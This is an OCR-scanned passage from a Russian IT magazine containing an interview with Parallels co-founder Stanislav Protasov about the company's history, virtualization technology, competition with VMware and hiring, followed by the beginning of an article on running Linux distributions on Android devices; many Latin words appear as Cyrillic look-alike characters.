ственным, а значит, тамошние процессы тоже 
остались со времен Советского Союза. В част- 
ности — учет рабочего времени. Нельзя было 
опаздывать и нельзя было уходить раньше. 
Когда проект закончился, это превратилось в 
пытку. Методично заставить себя изучать что- 
либо, не имея конкретной задачи, могуттолько 
фантастически сфокусированные люди. Про 
таких разве что кино снимают. 

Когда мотивация пропадает, побочные 
занятия (в игрушку поиграть, еще что-то 
сделать) тоже очень быстро приедаются. 
Невозможно сидеть и ничего не делать, почти 
физически ощущаешь, кактупеешь. Поэтому 
через год, когда стало совсем невыносимо, я 
оттуда сбежал. 

И попал в компанию Бипгіве, в которой 
уже работал Сергей Белоусов (основатель 
РагаІІеІз, Асгопіз, Аситаііса, фонда Рипа 
Сарііаі и позже близкий друг — прим, редак- 
ции). Его я совершенно не знал, туда меня 
позвал однокурсник. Я пришел как системный 
администратор, эникейщик, программист... 

В то время все было перемешано. 



ТАМ, ГДЕ ВОСХОДИТ СОЛНЦЕ 



Через год я попал в новое предприятие 
Белоусова. Тогда ему требовался технический 
человек в Сингапуре — Сергей занимал- 
ся бизнесом, связанным с поставкой из-за 
рубежа компьютерных запчастей, мониторов, 
принтеров и прочего. 

В интересах этой компании я поехал в Син- 
гапур, где и прожил пять лет. Именно там мы 
с Сергеем пытались заниматься софтверным 
бизнесом и впервые удалось что-то действи- 
тельно построить. 

Наш первый бизнес, по сути, был в области 
ІТ-аутсорсинга. Мы продавали американским 
компаниям Р&й-услуги российских инженеров. 
Правда, бизнес у нас был немного странный — 
наши российские инженеры тоже находились 
в Сингапуре. Причина была проста: в то время 
многие американские компании попросту 
боялись работать с Россией. Многие до сих пор 
смотрят с опаской, но тогда боялись откровенно. 

Американцев сильно напрягало, что два 
государства не признавали законы о защите 
интеллектуальной собственности друг друга. 
Эта проблема не вполне решена и сейчас, но 
сегодня уже многое сделано, чтобы сблизить 
законодательства двух стран в этом вопросе. 
При работе с российскими инженерами амери- 
канцы боялись отдавать им код: думали, что, 
как только они это сделают, в России тотчас 
появится клон американского продукта. Все 
копирайты и права для российского суда в то 
время являлись по большому счету филькиной 
грамотой. А с сингапурской компанией все 
охотно работали, верили нам, что российские 
инженеры достаточно толковые, много знают 
и вообще они даже не инженеры, а скорее 
ученые (что было правдой). 

Вплоть до 1999 года все выглядело хоро- 
шо. Но у нас всегда была идея, что лучше было 



бы делать свои продукты. Ведь аутсорсинг 
чем-то похож на бобу зЬорріпд, за исключе- 
нием того, что непосредственно людей не 
отправляют в офис заказчика. 

Максимум, за который тогда в Сингапуре 
можно было продать услуги инженера, был 
где-то 12-15 тысяч долларов в месяц за чело- 
века. Это не так мало, учитывая, что средние 
зарплаты в России тогда были ниже тысячи 
долларов, но это и не так много. 

Сингапурское правительство не давало при- 
возить дешевых инженеров — визы выдавали, 
только если мы везли специалистов, которые 
были дороже таких же местных. Последних 
тогда особенно не было, и они стоили дешево, 
потому что ничего толком не умели. Так что, 
привозя человека из России, мы должны были 
платить ему значительно больше, чем местному. 

Как устроен нормальный аутсорсинг 
бизнес, скажем, в Индии? У них есть про- 
ект — МісгобоЙ заказал услуги тестинга или 
таіпіепапсе. Они — хоп! — и нанимают под 
него три деревни. Если МісговоЙ этот проект 
прекращает — увольняют. Нет никакой про- 
блемы, если случится новый проект — их сно- 
ва наймут. В нашем случае такое не работало. 

Чтобы привезти человека за 10 тысяч 
километров, его нужно убедить сняться с 
места — ведь у него может быть семья, а это 
серьезное решение, переехать так далеко и 
надолго. К тому же начальные затраты доволь- 
но значительны. Если проекту нас не случился 
и мы увольняли человека, это была проблема 
не только для нас, но и для него. 

Мы с самого начала пытались создавать 
Р&Б-команду, а не «аутсорсинговую лавку», 
что очень помогло нам в будущем. Когда не 
было проектов, мы придумывали собствен- 
ные — давайте попробуем сделать продукт. 

У нас ничего не получалось, но мы учились, и 
учились наши люди. Мы вынуждены были про- 
давать услуги этих людей дорого, ведь у всех 
них был период, когда они не делали ничего, 
что приносило бы деньги. 

Когда в 1999 году начал лопаться пузырь 
доткомов, наш аутсорсинговый бизнес тоже по- 



чувствовал себя неважно. Индустрия устроена 
так, что, когда приходится экономить, в первую 
очередь отрезают внешних подрядчиков. 
Уволить человека куда сложнее, чем сказать 
контрагенту: «Извините, мы вас очень любим, но 
у нас сейчас нет возможности с вами работать». 
К тому же, сточки зрения цены на наши услуги, 
мы находились на верхнем уровне. 



ПЕРВЫЙ СОБСТВЕННЫЙ ПРОЕКТ 



В 1999 году мы назывались 5№оН, и АБР 
Ыпих был нашим проектом. Мы как раз вы- 
бирали, чем заниматься дальше, а в индустрии 
в то время было две основных темы для об- 
суждения: все говорили об арріісаііоп вегѵісе 
провайдерах (о том, что софт скоро начнет 
продаваться как сервис) и о Ыпих — о том, что 
эта система «отгрузит» МісгозоЙ очень быстро. 
У нас был опыт с ІЭ N IX, Ыпих, нам хотелось что- 
то сделать в этом направлении. Поэтому мы за- 
нялись контейнерной виртуализацией, стали 
разрабатывать и свой дистрибутив. Поскольку 
он был для А5Р (арріісаііоп вегѵісе ргоѵібег), он 
получил такое название. 

Самое важное в любом продукте — объяс- 
нить, чем именно он хорош. Этого невозможно 
добиться, заявляя: «Мы такие же, как РесІ Наі, 
только лучше. Чем лучше? Да всем». Это очень 
популярный ответ, сейчас у стартапов часто та- 
кое встречается. «Мы делаем РасеЬоок нового 
поколения. А в чем заключается „новое поко- 
ление"? Да во всем». У людей нет ответа. Они 
считают, что могут что-то сделать — дистри- 
бутив Ыпих или новый РасеЬоок, но до конца 
не понимают, чем именно он будет отличаться 
и кому вообще нужен. С А5Р Ыпих у нас это не 
слишком хорошо получилось. 

Мы пытались найти позиционирование 
для АБР Ыпих, но до конца нам это так и не 
удалось. У России тогда было несколько пре- 
тендентов на национальный дистрибутив, в 
частности команда АІ_Т Ыпих, А5Р Ыпих. Если 
смотреть на опыт Китая — они решили, что РесІ 
РІад будет их национальным дистрибутивом, 
действительно его поддерживали, но даже это 
практически не помогло. 
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Интервью со Станиславом Протасовым 



Вместе с тем у РагаІІеІз по Ыпих до сих 
пор достаточно убедительные позиции в том, 

что касается серверных вещей. Например, 
наши специалисты участвовали в разработке 
контейнерной технологии виртуализации 
0репѴ2 и ее проприетарного воплощения 
Рага I Іеіз ѴИ 110220 Сопіаіпегз. Часть идей 
контейнеров использует Соодіе для виртуали- 
зации своих ЦОДов. 

Мы запихиваем в мейнстрим «Линукса» 
все, что из этого получилось, в частности 
контейнерную технологию. Просто она пере- 
секает много подсистем ядра Ыпих, поэтому 
процесс запихивания весьма небыстрый. 

В разные годы Линус Торвальдс и другие 
люди говорили, что они понимают преимуще- 
ства контейнерной технологии, и общий курс 
таков: Ыпих-ядру нужен не только Ьурегѵізог, 
роль которого сейчас играет проект КѴМ, 
но и контейнерные технологии. Поэтому мы 
работаем и с другими группами, которые за- 
нимаются похожими проблемами, и потихоньку 
«толкаем». 

На сегодняшний день больше половины 
принято в таіпзігеат кегпеі, но это вовсе 
не значит, что вторую половину мы держим 
за спиной. Она тоже свободно доступна, тоже 
под лицензией 6РІ_. Больше половины нашего 
кода находится в любом ядре Ыпих, хоть от РесІ 
Наі, хоть с кегпеі. огд. 

Мы точно знаем, что боодіе для своей 
инфраструктуры использует нашу контейнер- 
ную технологию, часть которой есть в ядре. 
Так как по запсІЬох'ингу процессов идея очень 
хорошая (по ограничению ресурсов, по ограни- 
чению того, что они могут сделать) — ее много 
кто использует. 



ИЗ 5ѴѴ50ЕТ В РАКАІ_І_ЕІ_5 



В 2004 году мы купили небольшой стартап 
РагаІІеІз, чтобы дополнить нашу автомати- 
зацию и серверную виртуализацию их нара- 
ботками по десктоп-продукту. В результате 
бренд оказался настолько узнаваемым, что в 
начале 2008 года 5ѴѴзо1Ч изменила название 
на РагаІІеІз. Нашим англоговорящим клиен- 
там было сложно произносить «эс-дабл-ю- 
софт», да и РагаІІеІз лучше отражало суть 
бизнеса — одновременная работа несколь- 
ких ОС. 

Компания РагаІІеІз (в то время еще 5№оН) 
как бизнес началась тогда, когда проекты 
компании Н5Р Сотріеіе (система автомати- 
зации для хостинг-провайдеров) и ѴИиоио 
начали приносить деньги. Правда, очень не- 
большие. В 2000 году мы открыли офис в МФТИ 
в Москве, уже понимая, что наша офшорная 
разработка подходит к концу. Я приехал сюда, 
мы арендовали помещение в 100 квадратных 
метров. Нас было шесть человек. 

Потом начала понемногу расти команда, 
уже были планы по контейнерной технологии 
виртуализации. Где-то к середине или концу 
года мы поняли, что не выживем, если будем 
продолжать работать на две страны. Тогда 
мы предложили людям, которые работали в 
Сингапуре, переехать в Москву. Часть согла- 



силась, часть нашла работу в Америке, часть 
осталась в Сингапуре. 

В 2001 году мы выпустили первый офи- 
циальный релиз нашего продукта контей- 
нерной технологии ѴИионо, стали работать 
с хостинг-провайдерами, начали писать 
тападетепі Іооіз. Стало ясно, что хостеры — 
это те люди, которым наши продукты могут 
быть интересны. 

Однако вплоть до 2003 года сазіі Ноѵѵ у нас 
оставался отрицательным, хотя уже появи- 
лись первые клиенты. Это были оченьтяжелые 
годы, случалось, задерживали зарплату, 
платили людям не полностью. 

Представьте себе: у вас образовались 
какие-то деньги, которые вы решили потра- 
тить на стартап. У вас есть неплохая идея, да и 
вы вроде бы умный человек. Вас все слушают, 
кивают, но никто не готов разделить с вами риск. 
В итоге вы платите значимые для вас деньги 
(скажем, 100-200 тысяч долларов в месяц), а до- 
ход растет несопоставимо медленно, составляя 
ма-аленькую часть от этой суммы. Состояние та- 
кое... Да хочется все закрыть! Единственное, что 
удерживает, — понимание, что если закроешь, 
то уже точно ничего не вернется. 

Угроза того, что мы не выдержим, сломаем- 
ся и просто все закроем, в начале 2000-х висела 
над нами очень реально. Было тяжело. Разви- 
вались контейнерные технологии и контрольные 
панели вокруг них. Тогда с нами фактически 
конкурировала компания РІезк, похожая на 
нас тем, что продажи у нее были за рубежом, а 
разработка в России, конкретней — в Новоси- 
бирске. У них не было контейнерныхтехнологий, 
но были достаточно популярные контрольные 
панели. У нас контрольные панели тоже были, но 
плохие. Мы объединились и через полгода выш- 
ли на уровень Ьгеак еѵеп, хотя до объединения 
обе компании были убыточны. С тех пор один из 
наших центров разработки находится в Москве. 



МЕЧТА СВИЧЕРА 



Десктоп-виртуализация началась с очень ин- 
тересной истории. Существовала независимая 
компания, куда в начале 2000-х обратились 
немецкие предприниматели. Они сказали, что 
есть такая проблема: почти весь софт для бан- 
коматов написан под операционную систему 
05/2. Проблема в том, что ІВМ больше ее не 
поддерживает, бросила на произвол судьбы, 
а на новое железо 05/2 не встает. У банков, 
стало быть, есть два выхода — заменять 
банкоматы на новые (что очень дорого) или 
менять ПО на ѴѴіпсІоѵѵз N1 (это тоже дорого). Но 
можно поступить иначе — написать виртуаль- 



ную машину, которая будет изображать старый 
компьютер. Эту виртуальную машину можно 
ставить на ѴѴіпсІоѵѵз, а внутри будет 05/2, кото- 
рая будет держать тот же банковский софт. На 
этом, мол, можно заработать «тонны нефти». 

Мы нашли эту компанию. У нас давно со- 
зрела идея, что 5ѴѴзоК неплохо было бы иметь 
собственный гипервизор. В сущности, хотели 
договориться о том, чтобы мы их поглотили. 
Ключевые люди из этой команды работают 
с нами до сих пор, в частности — Николай 
Добровольский. 

Когда мы встретились с Колей, он хотел 
с нами договариваться. Он понимал, что мы 
дадим ему не только инвестирование, что 
мы лучше него знаем рынок и у нас уже есть, 
может быть, не совершенный, но работающий 
механизм маркетинга и продаж. Поэтому мы 
договорились на справедливых условиях и 
поглотили эту команду. 

На Мае мы тогда не смотрели. Мы просто 
поглотили их, не совсем понимая, как инте- 
грируем этот гипервизор «в себя». Планов, 
конечно, было море, но сначала мы ушли от 
идеи 05/2. Было понятно, что это «не взлета- 
ет», к тому же банки не могли сидеть и ждать, 
когда мы принесем им решение. Они просто 
апгрейдили свои системы, и 05/2 исчезала со 
сцены. 

Какое-то время мы держали команды раз- 
дельно. Было не очень понятно, как их инте- 
грировать, ведь бизнес, связанный с разработ- 
кой софта для сервис-провайдеров, и бизнес 
по разработке ПО для десктоп-виртуализации 
очень разные. Впрочем, у них есть общий мо- 
мент — гипервизор, который мы используем не 
только в десктопном ПО. В итоге мы все-таки 
сделали одну компанию — вряд ли мы смогли 
бы создать две инженерные команды, способ- 
ные делать хорошие продукты. 

Сейчас у РагаІІеІз два основных 
бизнеса — десктоп-виртуализация и софт 
для сервис-провайдеров, который позволяет 
им предоставлять малым бизнесам облачные 
услуги. «Облачная» часть нашего бизнеса рас- 
тет чрезвычайно быстро. 

«Облачный» софт состоит из двух частей. 
Первая — платформа, которая называется 
РОА (РагаІІеІз Орегаііопз Аиіотаііоп), отвечает 
за определение сервиса (почта, совместная 
работа, коммуникация), за склейку компонен- 
тов в единый сервис и доставку и установку 
всего этого на сторону клиента. Вторая — это 
РВА (РагаІІеІз Визіпезз Аиіотаііоп) — биллинг, 
умеющий работать с существующими биллинг- 
системами, в разных странах и так далее. 



УГРОЗА ТОГО, ЧТО МЫ НЕ ВЫДЕРЖИМ, 
СЛОМАЕМСЯ И ПРОСТО ВСЕ ЗАКРОЕМ, 

В НАЧАЛЕ 2000-Х ВИСЕЛА НАД НАМИ 
ОЧЕНЬ РЕАЛЬНО. БЫЛО ТЯЖЕЛО. 
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КОНКУРЕНЦИЯ С ѴМѴѴАКЕ 



Если вы занимаетесь чистым копировани- 
ем, вашим единственным аргументом будет 
фраза «Зато мы дешевле». А это очень слабая 
позиция. 

Хорошим примером будут китайские теле- 
фоны Ыокіа. Если посмотреть на них, там все 
отлично: две 5ІМ-карты, телевизор, цена хо- 
рошая — 3000 рублей, но люди все равно хотят 
обладать Затзипд и іРЬопе, а вовсе не ІМокІа. 

Сначала в десктоп-продукте под ѴѴіпсІоѵѵз 
и Ыпих мы во многом копировали то, что 
делала ѴМѵѵаге с ее ѴМѵѵаге ѴѴогкзІаІіоп. Но 
проблема с копированием заключается в том, 
что компания, которая копирует, — всегда 
догоняет. У ѴМѵѵаге было больше денег, у них 
была львиная доля рынка, и победить с на- 
шими силами и ресурсами на этом поле было 
невозможно. 

Но тут Арріе неожиданно объявила о перехо- 
де на процессоры Іпіеі; наша технология стала 
легко переносима на Мае 05. На руку нам сыгра- 
ло и то, что ѴМѵѵаге была большой компанией, я 
не могу сказать «неповоротливой», но... 

Арріе была совершенно не интересна 
большим игрокам с финансовой точки зрения. 
Первые оценки рынка, которые мы делали, 
были таковы — наверное, можно будет за- 
работать пять миллионов долларов в год. При 
озвучивании этой цифры у всех нас начина- 
лось непроизвольное слюноотделение, а для 
ѴМѵѵаге это было вообще ни о чем. 

Поставки Мае до сих пор составляют не 
более пары десятков процентов от всего 
количества ноутбуков РС, но они попадают 
к нужным людям. Например, СЕО Іпіеі ходит 
с Мае. То есть топ-менеджмент очень быстро 
полюбил их. И журналисты тоже. В общем, Мае 
занимает небольшую долю, но о нем говорятте 
люди, к чьему мнению прислушиваются. 

ѴМѵѵаге где-то через год заметила, что наш 
десктоп-продукт хорошо продается. Думаю, они 
решили раздавить нас чисто механически. Это 
было разумным решением с их стороны — вирту- 
ализацию они понимают довольно хорошо, опыт 
у них большой, компания сильная, они обладают 
огромным опытом в том, как делать правильный 
софтверный девелопмент. 

ѴМѵѵаге выпустила Ризіоп, который при- 
нялся отжирать наш рынок. В первый год 
Ризіоп перетянул к себе около половины наших 
клиентов. Но, в отличие от РагаІІеІз, для ѴМѵѵаге 
этот проект имел далеко не первостепенную 
значимость. Основное для них — это серверная 
виртуализация для епіегргізе-клиентов. А для 
нас РагаІІеІз йезкіор стал очень важной частью 
дохода практически с самого начала, поэтому мы 
сфокусировались на его развитии. 

Уже где-то через год мы принялись по- 
немногу отъедать обратно тех пользователей, 
которых потеряли. На сегодня мы занимаем 
доминирующую позицию на рынке десктоп- 
виртуализации, хотя ѴМѵѵаге уже перепробо- 
вала все способы борьбы с нами. 

На протяжении всех лет цена на продукт 
была одинаковой, а ѴМѵѵаге уронила свою 
цену в два раза. Но это уже не помогало. То 



есть экспериментальным путем мы выясни- 
ли — если сфокусироваться и долго бить в сте- 
ну, в одну точку, стену все-таки можно пробить. 



ПРОШЛОЕ И БУДУЩЕЕ 
ВИРТУАЛИЗАЦИИ М 



Основная проблема виртуализации — это 
скорость работы. Несмотря на то что мощность 
компьютеров растет с каждым годом, они все 
равно никогда не бывают достаточно мощными. 

Довольно важной вехой было то, что 
ѴМѵѵаге смогла добиться лучшей произ- 
водительности на серверах. Существует 
некий набор инструкций, которые гостевая 
ОС не может выполнять прямо на процес- 
соре. Если у вас есть инструкция, которую 
хочет выполнить гость, — сложить регистр 
АХ с регистром ВХ, нет проблемы, разрешим 
сделать это на процессоре. Однако имеет- 
ся некий ограниченный набор инструкций, 
который меняет режим работы процессора 
(сегментные регистры перезагружают, еще 
что-то). Если позволить гостю их делать, 
то вся изоляция между гостем и хостом ис- 
чезает. В лучшем случае это приводит к тому, 
что нет безопасности. Но тутуж бог бы с ней. 
В худшем случае все просто падает, так как 
по идее гостевая операционная система не 
должна знать ничего о хостовой. 

ѴМѵѵаге построила хорошую технологию, 
которая все это учитывает. Кроме того, есть 
еще один нюанс. Обработчик привилегиро- 
ванных инструкций не должен занимать много 
тактов, потому что они действительно встреча- 
ются часто, особенно в ядерном контексте. Так 
что если у нас стоит однотактная инструкция, 
а мы заменяем на обработчик, который вы- 
полняется в 10 000 тактов, мы тут же просажи- 
ваемся по скорости. 

В ѴМѵѵаге создали технологию, которую 
они называют динамической или бинарной 



трансляцией. Просто берут код, идут по нему 
и, если нужно, расширяют іп ріасе. К чему это 
приводит? К примеру, у меня здесь стоит некий 
)штр вот сюда. Я расширяю, соответственно, 
мне нужно проапдейтить этот )штір, чтобы он 
показывал в нужное место. 

Где-то к 2005 году они сделали это так 
хорошо, что мог бы гордиться любой инженер. 
Достаточно сказать, что, когда Іпіеі ввел свои 
аппаратные инструкции, получилось так, что 
у ѴМѵѵаге скорость динамической трансляции 
была примерно одинакова со скоростью аппа- 
ратного Іпіеі. 

Мы тоже с этим боролись с помощью кон- 
тейнеров, и, думаю, сейчас мы не сильно от- 
стаем от ѴМѵѵаге в этом вопросе. Изначально 
наш подход был похож на решение Соппесііх. 
Мы называли его зтагі кегпеі оріітігаііоп 
— немного проще, чем у ѴМѵѵаге, но хорошо 
работал, давал похожую производительность. 
Единственный его недостаток — закладыва- 
лось знание о том, что это именно та гостевая 
ОС, а не другая. В зависимости от конкретной 
гостевой ОС, паттерн встречи этих привилеги- 
рованных инструкций может меняться. 

Думаю, никаких особенных открытий 
в этой области в ближайшем будущем не 
произойдет. Реально прорывным с аппарат- 
ной точки зрения и с точки зрения поддержки 
виртуализации софтом была непосредственно 
технология ѴТХ. Остальные вещи, что они 
выпустили, — ѴЮ, ѴТС и прочее являются по- 
ступательными шагами. 

На сегодня виртуализация стала обыч- 
ным ресурсом. У МісгозоЙ есть Нурег-Ѵ. Есть 
ѴМѵѵаге с его Е5Х. У хостеров выбор еще шире: 
КѴМ, Хеп, Нурег-Ѵ, Е5Х, ѴИ 110220 , наш РагаІІеІз 
СІоисІ Зегѵег — что хочешь, то и используй. 
Виртуализация будет всегда и везде. В каждой 
ОС, на каждом устройстве, ведь это удобно с 
многих точек зрения. 
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Интервью со Станиславом Протасовым 



Что ждет нас дальше? Разумеется, Нурег-Ѵ 
никуда не уйдет. Как минимум, в ближайшие 
несколько десятков лет никуда не исчезнет 
Е5Х, потому как это гипервизор номер один на 
епіегргізе-рынке. Конечно, КѴМ будет расти — 
он простой, хорошо и компактно сделан. Его 
любят Ыпих кегпеі-люди, и это лишь вопрос 
времени, прежде чем он будет в каждом дис- 
трибутиве Ыпих. Хеп тоже не пропадет, но, 
мне кажется, его доля будет падать. Причина 
проста — вендоры дистрибутивов меньше 
внимания уделяют Хеп. Они не то чтобы пред- 
почитают КѴМ, просто Хеп сложнее. 

У сложных вещей есть возможность войти в 
каждый дистрибутив, если они входят в ѵапіііа 
кегпеі. Но чтобы пойти в ѵапіііа кегпеі, он 
должен интегрироваться, дабы его дальней- 
шая поддержка технологии виртуализации не 
представляла сложности. Лично у меня сложи- 
лось впечатление (возможно, ошибочное), что 
Хеп интегрируется не слишком хорошо. 

Делать свою виртуализацию сегодня 
могут только очень отважные люди. Не пред- 
ставляю, что нужно сотворить, чтобы найти 
там какую-то новую нишу. Впрочем, N ісіга, 
которую недавно купила ѴМѵѵаге, делала 
виртуализацию сети. Хороший пример — люди 
нашли нишу, в которой никто не играл. 

Конечно, мы знаем про ОрепРІоѵѵ, даже 
наблюдаем за ними, это кажется нам интерес- 
ным, но лично я не знаю, что из этого может 
получиться. Здесь ведь очень важен вопрос 
фокуса. Вечная проблема — не хватает времени 
и сил, фокусироваться нужно на чем-то одном. 
Хотя сетевая виртуализация может быть очень 
интересной темой, я не буду загадывать. 



ПРАВИЛА — ЭТО НЕ БОЛЕЕ, 

ЧЕМ РУКОВОДСТВО К ДЕЙСТВИЮ 



Было бы сложно перечислить 5-10 наших 
главных ошибок. Ошибки совершаются еже- 
дневно, и, как всегда и бывает с ошибками, 
скорее всего, главные среди них вовсе не те, 
которые я считаю главными. 

Составить непротиворечивый свод правил 
невозможно. Неважно — законы это или пра- 
вила разработки. Поэтому я всегда старался 
строить процессы, понимая, что обязательно 
возникнут ситуации, в ходе которых процесс 
будет нарушен. Ничего страшного в этом нет. 
Особенно в начале, когда у вас еще маленькая 
команда в 10-50 человек, роль процессов не 
очень важна. 

В России очень важно строить процессы 
с самого начала — с самого минимального 
размера стартапа. В Америке человек, пора- 
ботавший в МісгозоЙ и пришедший в Атагоп, 
не встречает для себя ничего удивительного. 
Потому что в Атагоп примерно 60% людей — 
перебежчики из МісгозоЙ. Придя в Ооодіе, он 
тоже не встретит ничего удивительного. Про- 
цессы в разных компаниях похожи. В России 
компаний, построивших инженерные про- 
цессы, очень мало. А от инженерных процессов 
зависит качество продукта. Если процесса нет, 
выдать на-гора качество невозможно. 

Спасибо ѴМѵѵаге за то, что она решила с 
нами конкурировать, — благодаря этому мы 



многому научились. Для того чтобы успешно 
противостоять такой компании, нужно иметь 
нормальную культуру разработки и нормаль- 
ные процессы. 

Рано или поздно точно приходится деле- 
гировать ответственность. Иначе контора не 
выживет. Микроменеджмент имеет недо- 
статок — если он продолжается все время, он 
демотивирует людей. Они просто занимают 
позицию «что скажут, то и буду делать». Как 
начальство придумает, так и будет. Главное 
— сделать все, что сказало начальство, и при- 
крыть себя со всех сторон. Это убивает любую 
инновационную компанию. 

Человек должен иметь право на ошибку и на 
выбор собственного пути. Но выбор собственно- 
го пути... чтобы человек правильно это сделал, 
он тоже должен быть натренирован. Скажем, вы 
ведь не разрешите своему годовалому ребен- 
ку ходить по лестницам самостоятельно — он 
споткнется и сломает шею. Вы даете ему руку и 
ведете за руку. Человека предварительно нужно 
специально тренировать. 

МісгозоН разработала свое видение и свой 
процесс, который мы активно заимствовали. 
Они изобрели роль программ-менеджера, 0А- 
менеджера, беѵ-лида — это триада, которая, 
по сути, работает над проектом. МісгозоЙ раз- 
работал все это потому, что период, который 
сейчас переживает РагаІІеІз, они пережили 
еще во времена мамонтов. 

Вначале мы обращали минимальное 
внимание на процессы. Да, у нас был зоигсе 
сопігоі, иначе просто невозможно коллективно 
работать над кодом. Да, с самого начала у нас 
был Ьид Ігаскіпд — давал о себе знать наш 
опыт с аутсорсных времен. Но вот гециігетепі 
тападатепі у нас не было. Многих других 
вещей тоже не было, например собе геѵіеѵѵ. По- 
нятие автоматического тестинга... нам повез- 
ло: контейнеры — такая технология, что нам 
пришлось озаботиться этим рано, но изначаль- 
но этого не было тоже. Разумеется, у нас есть 
внутренние порталы, мы используем и ѴѴікі, и 
БИагероіпЕ Есть и анбординг-процесс, есть и 
коучинг. Без этого невозможно существовать. 

Когда я был молодым, я считал, что можно 
сделать полную документацию на продукт, 
технологию. Нет, невозможно, получается 
слишком большой оѵегЬеаб. Должен быть 
здравый смысл, во многом отданный на откуп 
разработчикам и ключевым людям. 

В Америке пишут больше документации 
не потому, что они идиоты или, наоборот, 
очень умные. Просто они кровью заплатили 
за понимание пользы от этой документации. 

Огромное количество людей неспособно 
написать документацию. Можно, конечно, их 
заставлять, посылать на курсы, но, к сожале- 
нию, это не очень помогает. Также есть люди, 
которые пишут документацию охотно, им это 
нравится. Нужно поощрять их делать такие 
вещи. В общем, все как обычно — серебряной 
пули нет. 



РАБОТА С КОМАНДОЙ 



Процесс интервью у нас относительно нефор- 
мализованный, но мы стараемся, чтобы было 



минимум три интервью, на каждое из которых 
отводится час. На интервью приходит один 
человек. Это важно. 

Интервью комитетом — глупая вещь, что 
мы уже выучили на собственном опыте. Дело 
в том, что когда с кандидатом разговаривают 
несколько человек, у них сразу же образуется 
единое мнение. Если они говорят по отдельно- 
сти — не факт, что оно будет единым. 

На интервью я задаю вопросы трех типов. 
Первый — просто жизненный, на общую 
адекватность. Второй — на соображалку. 
Третий — элементарные вещи, помогающие 
понять, что подготовка соискателя не совсем 
безнадежна. Например, мы спрашиваем, как 
компилятор что-нибудь на стек положит. 
Просто чтобы увидеть, есть ли у человека 
понимание основ. 

В софтверном инжиниринге все задачи 
неспецифицированы до конца. Поэтому есть 
еще одна важная часть интервью: понять, 
насколько человек быстро и хорошо сообра- 
жает. Наверняка вы слышали про вопросы для 
собеседования в Ооодіе: шарики в автобусе, 
помыть стекла... Эти задачки не обязатель- 
но должны быть про шарики в автобусе. Они 
не на логику. Идея в том, чтобы посмотреть, 
как хорошо человек подходит к решению 
неспецифицированных задач. Когда условия 
этой задачи приходится ставить самому. 

Всех кандидатов через себя не пропускаю. 
Всех я бы, наверное, сейчас уже не потянул. У 
нас есть статистика... думаю, в неделю у нас 
проходит около 30-50 интервью. Людей мы 
ищем постоянно. 

Хороший, очень глубокий человек ищет 
работу редко. Это происходит раз в 5-10 лет, 
потому что контора накрылась, отдел разогнали 
или ему дали начальника, который принялся де- 
монстрировать свое эго, и человек не выдержал. 

Команда — это очень важно, это самое 
важное в софтверном бизнесе. Суперквали- 
фицированные, суперопытные, мотивиро- 
ванные работой и интересными проектами 
люди встречаются, но очень редко. Именно 
поэтому нужно интервьюировать все время, 
иначе такие люди не будут попадаться вовсе. 
Если же такой человек находится, когда у 
компании приостановлен наем, его все равно 
нужно затаскивать в компанию, несмотря 
на сопротивление кого угодно. Это редкие 
люди. 

Реальная ценность РагаІІеІз заключена 
в том, что называется интеллектуальной 
собственностью. Это код, который мы напи- 
сали. Но не только он. Без того, что в головах 
людей, этот код не имеет смысла. Любой, кто 
возьмет его и попытается что-то с ним сделать, 
наступит на огромное количество граблей, на 
которые мы уже наступили. И даже если по- 
просить нас рассказать об этих граблях — мы 
не сможем. Они обходятся инстинктивно, все 
прямо как у опытных саперов. 

Я уверен, что нашим драйвером роста был 
не продукт. Драйвер роста — это всегда люди. В 
нашем случае драйвером роста выступало наше 
неуемное желание делать продукты, а также, 
может быть, некая наша бестолковость. НС 
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Мечтают 
ли андроиды 

об электропингвинах? 




УСТАНАВЛИВАЕМ І-ШІІХ-ДИСТРИБУТИВ НА ТЕЛЕФОН 
И ПЛАНШЕТ ПОД УПРАВЛЕНИЕМ АЫОКОІО 



Прошло совсем немного времени с момента выпуска первых смартфонов под управлением ОС АпсІгоісІ до 
того, как энтузиасты научились запускать на них полноценные дистрибутивы Ыпих. Сегодня методики 
установки Ыпих-дистрибутивов на АпсІгоісІ-устройства широко известны, а в репозитории Ооодіе 
РІау есть даже автоматизированные системы установки и запуска Ыпих. В этой статье я попытаюсь 
аккумулировать весь накопленный опыт работы с Ыпих на смартфонах, расскажу, зачем это нужно, 
и покажу, как избежать возможных подводных камней при переносе Ыпих на смартфон или планшет. 
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ЗАЧЕМ? 

На первый взгляд может показаться странным, что кто-то пытается 
запустить на мобильном устройстве операционную систему, в 
принципе не предназначенную для работы с экраном небольших 
размеров и без достаточно точного манипулятора (мыши) и клавиа- 
туры. Однако не стоит делать поспешных выводов. Дистрибутив 
Ыпих может дать владельцу смартфона достаточно много преиму- 
ществ, среди которых набор старых проверенных инструментов, 
таких как утилиты командной строки, продвинутые редакторы, 
РТР- и 55Н-серверы, сетевые инструменты и средства разработки 
приложений. Запустив Ыпих без графической оболочки на смарт- 
фоне с хардварной клавиатурой (Моіогоіа ОгоісІ, к примеру), можно 
достаточно комфортно всем этим пользоваться прямо на ходу без 
необходимости покидать сам АпсІгоісІ. Все инструменты доступны 
в любой момент, а смартфон продолжает оставаться смартфоном, 
позволяя принимать звонки и слушать интернет-радио. 

Второй аргументза установку Ыпих на смартфоне — это воз- 
можность использовать его в качестве переносной рабочей стан- 
ции, которую можно подключить к любому ПК и тутже получить 
доступ к терминалу с помощью 55Н/ТеІпеЫклиента либо клиента 
ѴІМС/РРезкІор. Это по определению лучше, чем флешки с установ- 
ленным Ыпих, так как нет необходимости, во-первых, перезагру- 
жать машину, а во-вторых, гонять туда-сюда данные; результаты 
твоей работы будут доступны сразу после того, как отключишь 
смартфон от компа. 

Наконец, наибольший выигрыш Ыпих дает на планшетах, экран 
которых позволяет более-менее сносно работать в графической 
среде, а возможность подключить мышь и клавиатуру через 0Т6- 
кабель так и вообще дает шанс превратить планшет в полноценную 
рабочую станцию. При этом никакой особой разницы между уста- 
новкой дистрибутива Ыпих на планшет и смартфон нет. 

КАК? 

Перенести Ыпих на АпсІгоісІ действительно просто, и главную роль 
здесь играет ядро Ыпих. Любой Ыпих-дистрибутив представляет 
собой набор приложений и библиотек, работающих поверх ядра 
Ыпих, а так как АпсІгоісІ сам основан на почти не измененном ядре 
Ыпих, эти приложения и библиотеки можно без каких-либо про- 
блем запустить внутри среды АпсІгоісІ. Достаточно лишь подыскать 
дистрибутив, для которого существует порт на платформу АРМ (не 
забываем, что 99% всех АпсІгоісІ-девайсов работают на АРМ), уста- 
